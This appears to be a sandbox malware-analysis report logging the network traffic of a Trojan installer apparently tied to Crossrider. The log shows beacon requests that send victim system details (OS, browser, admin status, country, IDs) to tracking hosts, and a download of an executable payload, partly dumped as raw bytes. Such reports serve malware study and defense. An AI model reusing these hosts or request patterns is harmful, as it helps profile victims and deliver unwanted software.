x-amz-request-id: D9B49812856D47D8

Date: Thu, 05 Mar 2015 23:24:08 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: aiz9xgvD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x..x-amz-request-id: D9B49812856D47D8..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: YfZq4aAKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF

x-amz-request-id: 0326DD6CDACB1E14

Date: Thu, 05 Mar 2015 23:24:10 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: YfZq4aAKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF..x-amz-request-id: 0326DD6CDACB1E14..Date: Thu, 05 Mar 2015 23:24:10 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: pA/BMrf6nnbcsXt9aUrjBMJXCjMg/rYN0bREwFw2IFJjiNAFiGowVVRm08n4cTXj

x-amz-request-id: 782D1254A2753524

Date: Thu, 05 Mar 2015 23:24:10 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: tu J10nP 3UiJjMiersLzKMfUM//adluDe3txSAwe0xiPcLPCBY5gbiIfcRIhUyJ

x-amz-request-id: 856775D186715B3E

Date: Thu, 05 Mar 2015 23:24:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: c7R66s0PbI6RE2OyTOiCC/kkDREmnq8XI9Rrb31NiEInzxWmSTj6svYElmM6GGW3

x-amz-request-id: EEA240B973A1ED0B

Date: Thu, 05 Mar 2015 23:24:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: jf4p2TpI1QvS4utE gh41cCrCUXngSXk9kIDTep6JbEcK98dPVUaxRXECXnpLHcC

x-amz-request-id: FBE2853165EBC225

Date: Thu, 05 Mar 2015 23:24:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: vncs5DFxlxNe5vB3cTxcHPuo4uYeUPMRYUmU2TsEieD4MwiL4d6lbiXiNTtRveSD

x-amz-request-id: 324E8B4267AD49B1

Date: Thu, 05 Mar 2015 23:24:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: T31DEGAF6h4dLzhlC422YM7O0Gl5KZ7sCd1d6z6yoij0mBcnDMp3bJk9sLrV/JT3

x-amz-request-id: BF691D9E6E248501

Date: Thu, 05 Mar 2015 23:24:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: ttgnYaHLNdphi3cl2cTDyuw3wDrD9mFYxXExz2wOsce4Qf2LLcxOb9L72gQsFkhv

x-amz-request-id: C667B0063F2F2E11

Date: Thu, 05 Mar 2015 23:24:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: l/XfenbIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i

x-amz-request-id: 535D90B37079E09D

Date: Thu, 05 Mar 2015 23:24:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: l/XfenbIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i..x-amz-request-id: 535D90B37079E09D..Date: Thu, 05 Mar 2015 23:24:12 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: GjC3mnbWhImS6Wr09zk2cotmx45tUhke1isOX 7XHJNlTycAlHMdwhOd7bFM4b6K

x-amz-request-id: ED30DA0F391DC5A2

Date: Thu, 05 Mar 2015 23:24:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: Bg1LKYB9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK

x-amz-request-id: 8EA97A25493FB8FC

Date: Thu, 05 Mar 2015 23:24:12 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Bg1LKYB9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK..x-amz-request-id: 8EA97A25493FB8FC..Date: Thu, 05 Mar 2015 23:24:12 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1

Host: stats.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: CI/xqrh7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB

x-amz-request-id: C7467C452F157333

Date: Thu, 05 Mar 2015 23:24:08 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: CI/xqrh7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB..x-amz-request-id: C7467C452F157333..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1

Host: stats.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: vgIRq9xlWi7A2OtBmXsJCbotmSTVr5MK1z v0sz8o3fTTfSeKrYM1GfS4qpBlv w

x-amz-request-id: 3CBC5AFF8D68D5F6

Date: Thu, 05 Mar 2015 23:24:13 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1

Host: stats.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: u8LTwYQJKffKricroarszKXJRYq9a3kbqfiiuvLg3 TDit7DU3UnBq7Kkmq7saVP

x-amz-request-id: 338D1C02DC56E30B

Date: Thu, 05 Mar 2015 23:24:13 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 25 Feb 2014 00:16:09 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;..

GET /utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Thu, 05 Mar 2015 23:23:55 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Thu, 05 Mar 2015 23:24:00 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /outil/fuully/styi2/setup.exe_c HTTP/1.1

Host: dl.ourgenstatsstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 05 Mar 2015 23:23:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1425461996"

Last-Modified: Wed, 04 Mar 2015 09:39:56 GMT

Cache-Control: max-age=2512

Content-Length: 2530652

Content-Type: text/plain

X-HW: 1425597835.dop012.fr7.t,1425597835.cds019.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds002.dc1.c,1425597835.cds019.fr7.pr

>.. ...Y:..<.J:.......[..B...s.......^..l)..(.F.3..<.._...af.m..3...XX...X;/.m.T.]..E9........BZ....... ...;..F.....n...fN....e G.'.o.....DR...>.?.H...U.wQi.r..,x.?.i./!..m....AZ.}1..V.s..X...>.`.-]...l..^...M.<..z...W...e.1h\...N.O}.c<........h..E7..8i......I3'9.. .G....R..c#......]....~..}jz..ZX.".yV....Q...v.....ZI..6....../..<.^`]..2s...l.L....[M......W..0....nI.}#\.....d..2.y{....6...Th......4K.1`*'...sI.)_.`.SL....i..U.j.9?.2...1....H).D...D..U@:AYP^....V'%.....!.....B0........E.[.H.".#.&..|f....X.1.#..N...d=K.......xU.....d...).j*m-D#....<_.;IT.*.#\.s....../.Z.YD../g../..*.8...P.#..7....a..I...>.%..Oj5.u.............V`j.>.[|..F_..e..\ .@!..)...a....>..E..>.Wa..{.........NiT.a.a.JPu.....Co$...6t...."n)..C....?D,.....%....F...(.;.<.{8...G....Oe...|.)..bs..=C......k....3....rr.....B. 0@......~.I(.. .]...5.d....B[Ip1..%...SW*u&..A....E.~...;NYk.%...E0j:Z...o...oV..t....~.......k.....#U..>M.KhPi.$..=q.k.a......QI.....r.....#=...%.2..2g...u%..>..NhG..$.(....v........ .AFgpJ.s......Y.t4U..@.L.=...g..............g.....=..().6..............{.-..f.......2....%f.........=....o,...T;...Y,..(j..k.#.....pWE..B..'p.y7.&.....$c.d..a..s.g..x....U.%5..G2.b..n.....~..d...7...XWf0...5.f..D[.Eq.5Oog...........!..u.......R.9~....G..K../........U.j......@)I.....m.$R.....C"...n.....@..<..=1,$...O[T.......%.#.....R]...6...~y.{.<...{....j...p..3%..7.S... e.!....^w.....e.<.../....z0.^..r....I...tc.>.*.....t..#.&dgks...0..F<Za..OK..=../.z.K..... ....S.RN...S..O.r.......

<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Thu, 05 Mar 2015 23:23:59 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Thu, 05 Mar 2015 23:23:54 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps